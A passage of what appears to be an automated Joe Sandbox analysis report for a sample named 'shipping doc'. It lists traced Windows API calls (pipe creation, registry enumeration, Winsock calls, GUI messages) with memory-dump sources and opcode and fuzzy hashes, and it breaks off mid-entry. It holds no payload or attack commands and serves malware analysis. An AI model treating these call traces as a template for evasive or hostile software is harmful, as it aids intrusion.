                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0015052E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandlePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 1424370930-2873401336
                                                                                              • Opcode ID: db6427c3893561fb26a2c8c5f4e3ffb552064391d499743476256ddcd87904ee
                                                                                              • Instruction ID: fba44fb72c111e6333faf6d96ceb1c2aa10da669db014a07a6b8c18942f1cefd
                                                                                              • Opcode Fuzzy Hash: db6427c3893561fb26a2c8c5f4e3ffb552064391d499743476256ddcd87904ee
                                                                                              • Instruction Fuzzy Hash: 97217E75510305EFDB219FA9D804A9A77B4BF49725F204A19FCB1EA2E0E7709988CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 001505C6
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00150601
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandlePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 1424370930-2873401336
                                                                                              • Opcode ID: fa7c270c8f3e17821570fe7f6295dae575e0bb4cd055ed1eb81df2ac94c272fa
                                                                                              • Instruction ID: fc4913c7bdde53d15715e79d61bfdddd82915a591914edfb68ed05bddb844e2c
                                                                                              • Opcode Fuzzy Hash: fa7c270c8f3e17821570fe7f6295dae575e0bb4cd055ed1eb81df2ac94c272fa
                                                                                              • Instruction Fuzzy Hash: D8217F75500306DFDB219FA9CC04A9A77A4BF99721F240A19ECB1EB2E0E77099A4CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000E604C
                                                                                                • Part of subcall function 000E600E: GetStockObject.GDI32(00000011), ref: 000E6060
                                                                                                • Part of subcall function 000E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000E606A
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00174112
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0017411F
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0017412A
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00174139
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00174145
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: f486f9aca6c5e1498902d79850f47e783281bd1add3f8701ce6296d547e0c9a1
                                                                                              • Instruction ID: 7e8d628080fb33bb6f912537870140323a04c0e85372da4701964ae390abdaab
                                                                                              • Opcode Fuzzy Hash: f486f9aca6c5e1498902d79850f47e783281bd1add3f8701ce6296d547e0c9a1
                                                                                              • Instruction Fuzzy Hash: 1011B2B2140219BFEF119F64CC85EE77FADEF18798F118110BA18A2190C7729C61DBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0011D7A3: _free.LIBCMT ref: 0011D7CC
                                                                                              • _free.LIBCMT ref: 0011D82D
                                                                                                • Part of subcall function 001129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000), ref: 001129DE
                                                                                                • Part of subcall function 001129C8: GetLastError.KERNEL32(00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000,00000000), ref: 001129F0
                                                                                              • _free.LIBCMT ref: 0011D838
                                                                                              • _free.LIBCMT ref: 0011D843
                                                                                              • _free.LIBCMT ref: 0011D897
                                                                                              • _free.LIBCMT ref: 0011D8A2
                                                                                              • _free.LIBCMT ref: 0011D8AD
                                                                                              • _free.LIBCMT ref: 0011D8B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                              • Instruction ID: 32171ebeac2fb8d0622120f52d599f38b2a0d67d921f2014e4b11950d84fdb49
                                                                                              • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                              • Instruction Fuzzy Hash: A1118E71540B18AAD625BFF0DC07FCB7BDCAF20704F440835F299AA0D2DBB4B5A58661
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0014DA74
                                                                                              • LoadStringW.USER32(00000000), ref: 0014DA7B
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0014DA91
                                                                                              • LoadStringW.USER32(00000000), ref: 0014DA98
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0014DADC
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 0014DAB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 4072794657-3128320259
                                                                                              • Opcode ID: 023f29ca2ae47fe30fab828d780ce3ac0318919a421d3e5ab80e0f0073ddcf32
                                                                                              • Instruction ID: 1f8584da2355b6fdaee0e4e460e5e6a6faacd1578b5f03eb65f85f7e09443c17
                                                                                              • Opcode Fuzzy Hash: 023f29ca2ae47fe30fab828d780ce3ac0318919a421d3e5ab80e0f0073ddcf32
                                                                                              • Instruction Fuzzy Hash: 000162F6500208BFEB11ABA0DD89EE7367CE708701F4044A9B70AE2441EA749EC48FB5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(0185E5A8,0185E5A8), ref: 0015097B
                                                                                              • EnterCriticalSection.KERNEL32(0185E588,00000000), ref: 0015098D
                                                                                              • TerminateThread.KERNEL32(0185CF18,000001F6), ref: 0015099B
                                                                                              • WaitForSingleObject.KERNEL32(0185CF18,000003E8), ref: 001509A9
                                                                                              • CloseHandle.KERNEL32(0185CF18), ref: 001509B8
                                                                                              • InterlockedExchange.KERNEL32(0185E5A8,000001F6), ref: 001509C8
                                                                                              • LeaveCriticalSection.KERNEL32(0185E588), ref: 001509CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: 4df7fbe38618896a52fb2e99bf3e35d6ae06502317ee052706989757f288d56d
                                                                                              • Instruction ID: ef1c156b9f9bb3eb0a210cad418db7c1d92f92aeb59d6d1125cc506f94c13eef
                                                                                              • Opcode Fuzzy Hash: 4df7fbe38618896a52fb2e99bf3e35d6ae06502317ee052706989757f288d56d
                                                                                              • Instruction Fuzzy Hash: 03F01932442A02EBD7425BA4EE88AD6BB39BF05702F402029F206A4CA5CB7494E5CFD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 000E5D30
                                                                                              • GetWindowRect.USER32(?,?), ref: 000E5D71
                                                                                              • ScreenToClient.USER32(?,?), ref: 000E5D99
                                                                                              • GetClientRect.USER32(?,?), ref: 000E5ED7
                                                                                              • GetWindowRect.USER32(?,?), ref: 000E5EF8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                              • String ID:
                                                                                              • API String ID: 1296646539-0
                                                                                              • Opcode ID: 02698aff017e7db59077c117157ae87c716c836c6813896fe8a021f7583ba09a
                                                                                              • Instruction ID: 4e10bf797aacedd67847456a95b05cda5fb7a9b8fae88ce3d0ee0f0f3336aecf
                                                                                              • Opcode Fuzzy Hash: 02698aff017e7db59077c117157ae87c716c836c6813896fe8a021f7583ba09a
                                                                                              • Instruction Fuzzy Hash: F7B16C34A1068ADFDB24CFA9C8407EEB7F1FF58315F14881AE8A9E7250D730AA51DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __allrem.LIBCMT ref: 001100BA
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001100D6
                                                                                              • __allrem.LIBCMT ref: 001100ED
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0011010B
                                                                                              • __allrem.LIBCMT ref: 00110122
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00110140
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1992179935-0
                                                                                              • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                              • Instruction ID: 9f1489a132a2f707b77a015a4e15af76512705f92402f8d3b36fa10c78c3e4e6
                                                                                              • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                              • Instruction Fuzzy Hash: AF812872A00706ABE7299F28CC82BAB73E8AF69364F25413DF451D66C1E7F4D9C18750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00163149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0016101C,00000000,?,?,00000000), ref: 00163195
                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00161DC0
                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00161DE1
                                                                                              • WSAGetLastError.WSOCK32 ref: 00161DF2
                                                                                              • inet_ntoa.WSOCK32(?), ref: 00161E8C
                                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00161EDB
                                                                                              • _strlen.LIBCMT ref: 00161F35
                                                                                                • Part of subcall function 001439E8: _strlen.LIBCMT ref: 001439F2
                                                                                                • Part of subcall function 000E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,000FCF58,?,?,?), ref: 000E6DBA
                                                                                                • Part of subcall function 000E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,000FCF58,?,?,?), ref: 000E6DED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                              • String ID:
                                                                                              • API String ID: 1923757996-0
                                                                                              • Opcode ID: b424eda78d68fd94ce5a4973bd895527c53fea0155b6c6bf318bad389877ff48
                                                                                              • Instruction ID: db8b4ef9baf3594b01313c86c2231c581d3c02b535aa0010fac96b4194a6edc9
                                                                                              • Opcode Fuzzy Hash: b424eda78d68fd94ce5a4973bd895527c53fea0155b6c6bf318bad389877ff48
                                                                                              • Instruction Fuzzy Hash: 86A1D031604340AFC324DF24CC95F6A77A5AF94318F98894CF55A5B2A3CB71ED86CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001082D9,001082D9,?,?,?,0011644F,00000001,00000001,8BE85006), ref: 00116258
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0011644F,00000001,00000001,8BE85006,?,?,?), ref: 001162DE
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001163D8
                                                                                              • __freea.LIBCMT ref: 001163E5
                                                                                                • Part of subcall function 00113820: RtlAllocateHeap.NTDLL(00000000,?,001B1444,?,000FFDF5,?,?,000EA976,00000010,001B1440,000E13FC,?,000E13C6,?,000E1129), ref: 00113852
                                                                                              • __freea.LIBCMT ref: 001163EE
                                                                                              • __freea.LIBCMT ref: 00116413
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: a9b7404c5c98278c8607e47b98f9dd2b256cb370179f63d2ab5f4cd1acb5e0c5
                                                                                              • Instruction ID: fdbc2e387ed97735dc14ea1ad3b768aea5c925f283a7a198d7511772c3a1d18f
                                                                                              • Opcode Fuzzy Hash: a9b7404c5c98278c8607e47b98f9dd2b256cb370179f63d2ab5f4cd1acb5e0c5
                                                                                              • Instruction Fuzzy Hash: FB51E172A10226ABDB2D8F64CC81EEF77AAEB54710F154239FC19D6140EB36DCC0D6A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                                • Part of subcall function 0016C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0016B6AE,?,?), ref: 0016C9B5
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016C9F1
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016CA68
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016CA9E
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0016BCCA
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0016BD25
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0016BD6A
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0016BD99
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0016BDF3
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0016BDFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                              • String ID:
                                                                                              • API String ID: 1120388591-0
                                                                                              • Opcode ID: 6d14afe4df72faaff9dde4dc412418ada1330cb668f3c024320ed4d52afaf03d
                                                                                              • Instruction ID: fe692c86f66abce1a209f60cb597c4638d19aee4f0c57caf47ff9609f5fbd585
                                                                                              • Opcode Fuzzy Hash: 6d14afe4df72faaff9dde4dc412418ada1330cb668f3c024320ed4d52afaf03d
                                                                                              • Instruction Fuzzy Hash: AE818C31208241AFD714DF64C8C5E6ABBE5FF84308F14895CF5598B2A2DB32ED95CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000035), ref: 0013F7B9
                                                                                              • SysAllocString.OLEAUT32(00000001), ref: 0013F860
                                                                                              • VariantCopy.OLEAUT32(0013FA64,00000000), ref: 0013F889
                                                                                              • VariantClear.OLEAUT32(0013FA64), ref: 0013F8AD
                                                                                              • VariantCopy.OLEAUT32(0013FA64,00000000), ref: 0013F8B1
                                                                                              • VariantClear.OLEAUT32(?), ref: 0013F8BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                                              • String ID:
                                                                                              • API String ID: 3859894641-0
                                                                                              • Opcode ID: 539272e1e1ca62b2923c13304c7620f551c68d3e773989cd83d5450114cb8a4c
                                                                                              • Instruction ID: e3d841f74d63aaadc43aef8b6712935b77302412f2646dd56a6cc3ccd87e536d
                                                                                              • Opcode Fuzzy Hash: 539272e1e1ca62b2923c13304c7620f551c68d3e773989cd83d5450114cb8a4c
                                                                                              • Instruction Fuzzy Hash: 1A51F431E00300FADF28AB65D895B79B3A8EF55314F20946EF906EF292DB708C45C796
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E7620: _wcslen.LIBCMT ref: 000E7625
                                                                                                • Part of subcall function 000E6B57: _wcslen.LIBCMT ref: 000E6B6A
                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 001594E5
                                                                                              • _wcslen.LIBCMT ref: 00159506
                                                                                              • _wcslen.LIBCMT ref: 0015952D
                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00159585
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$FileName$OpenSave
                                                                                              • String ID: X
                                                                                              • API String ID: 83654149-3081909835
                                                                                              • Opcode ID: 5f977c7aa817927500ae53d2014fc0ff820caadf90004e0f2be5e0bc0df5d824
                                                                                              • Instruction ID: 7cbf0e03f64dd7fce42661cc846c396a14f942f309e8d6144a7c1b66118cbd59
                                                                                              • Opcode Fuzzy Hash: 5f977c7aa817927500ae53d2014fc0ff820caadf90004e0f2be5e0bc0df5d824
                                                                                              • Instruction Fuzzy Hash: DDE1A331508340DFC724DF25C881AAAB7E0FF85314F14896DF999AB2A2DB31DD45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000F9BB2
                                                                                              • BeginPaint.USER32(?,?,?), ref: 000F9241
                                                                                              • GetWindowRect.USER32(?,?), ref: 000F92A5
                                                                                              • ScreenToClient.USER32(?,?), ref: 000F92C2
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000F92D3
                                                                                              • EndPaint.USER32(?,?,?,?,?), ref: 000F9321
                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001371EA
                                                                                                • Part of subcall function 000F9339: BeginPath.GDI32(00000000), ref: 000F9357
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
